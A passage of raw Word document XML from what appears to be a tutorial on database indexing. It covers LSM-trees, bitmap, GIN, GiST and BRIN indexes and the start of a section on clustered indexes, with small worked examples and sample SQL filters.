            <w:r w:rsidRPr="00A12791">
              <w:t>Can be higher (merge from multiple levels)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B32E04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Efficient (single sorted traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="535B4A9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898A38" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Space amplification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885D90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Lower (compaction removes dead entries)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7A2145" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Higher (page fill factor ~70%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="317E265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49E8E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Disk write pattern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78185E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Sequential only (append + merge)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4BA823" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Random (update-in-place)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F910F4D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> LevelDB, RocksDB, Cassandra, HBase, ScyllaDB, CockroachDB (storage engine).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B04CBF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When LSM-Trees win:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210EDFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Write-heavy workloads (100x more writes than reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86CC0A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>SSDs (where random vs. sequential write difference is smaller, but write amplification affects SSD lifespan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E8043" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Time-series data (append-heavy, rarely updated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B6215" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Bitmap Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E8E00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A960E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For a column with few distinct values (low cardinality), store a bitmap for each distinct value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B5AE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAEBCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Column: status (values: 'active', 'inactive', 'suspended')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D249419" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table has 8 rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F527C9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1A8384DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bitmap for 'active':    [1, 1, 0, 1, 0, 1, 1, 0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C75BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bitmap for 'inactive':  [0, 0, 1, 0, 0, 0, 0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DA5A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bitmap for 'suspended': [0, 0, 0, 0, 1, 0, 0, 0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521806C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7EC7D7DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE status = 'active' AND region = 'US'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0B9CF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Bitmap AND: status_active_bitmap &amp; region_US_bitmap = result bitmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD51E87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Scan result bitmap for 1s → those are matching row positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34010333" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4936C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Extremely fast for multi-column filtering (bitwise AND/OR operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF84C2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Very compact for low-cardinality columns (status, gender, country, boolean flags).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F7885" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Terrible for high-cardinality columns (email, UUID — each bitmap has mostly zeros).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F712A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Terrible for write-heavy workloads (must update bitmaps on every write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06753300" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Oracle (explicitly), data warehouses (analytical queries with many filters), column stores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59323933" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 GIN (Generalized Inverted Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C94E30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C98086" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Maps each element/token to the set of rows containing it. "Inverted" because instead of row→values, it's value→rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04545C8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336ED507" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 1: "the quick brown fox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF3E8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 2: "the lazy brown dog"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F1B89" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 3: "the quick red fox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761023B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="64373896" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>GIN index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582BE51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "the"   → [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBEB82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "quick" → [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116E25E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "brown" → [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F73201" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "fox"   → [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745FB99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "lazy"  → [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1EF00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "dog"   → [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACACBB6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "red"   → [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5D07F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="314C67A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE document @@ 'quick &amp; fox'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30A756" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → "quick" rows: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74908740" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → "fox" rows: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A18980" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Intersection: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24D907" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6C01B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Full-text search (PostgreSQL tsvector, tsquery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B248821" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>JSONB containment queries (WHERE data @&gt; '{"status": "active"}').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138715EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Array containment (WHERE tags @&gt; ARRAY['urgent', 'bug']).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061314A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>PostGIS spatial queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BACB7F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 GiST (Generalized Search Tree)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19DDD6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> A framework for building tree-structured indexes for non-traditional data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67603E9F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F3878" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Geometric/spatial data (R-Tree for bounding boxes, point-in-polygon queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64364436" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Range types (overlapping ranges: WHERE range &amp;&amp; '[2024-01-01, 2024-12-31]').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3A5C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Network addresses (IP range containment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085ACAAA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Full-text search (alternative to GIN with different tradeoffs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D7E4D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 BRIN (Block Range Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C831FB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D63D3B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Stores the MIN and MAX value of an indexed column for each block range (group of consecutive heap pages):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD1A05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C213C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pages 0–127:   min=1, max=1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3D889" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pages 128–255: min=1001, max=2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486BC2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pages 256–383: min=2001, max=3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED5A2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA90554" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="023E3BF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE id = 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F1B0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Check BRIN: 1500 is between 1001 and 2000 → only scan pages 128–255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D4433" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Skip all other page ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE22C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08892CB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Tiny index size (orders of magnitude smaller than B-Tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185756C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Only effective when data is physically correlated with the indexed column (e.g., auto-increment ID, insertion timestamp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F67D43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Useless if data is randomly distributed (every block range contains every value range).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563042B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ideal for:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Large append-only tables where the indexed column naturally increases (time-series, log tables, event streams with sequential IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B417E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="7996F311">
          <v:rect id="_x0000_i5324" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C334C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Types of Indexes by Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898D11D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Clustered Index (Primary Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B0B98" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> The table data IS stored sorted by the index key. The index IS the table. There can be only ONE clustered index per table (you can only sort data one way physically).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1899B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
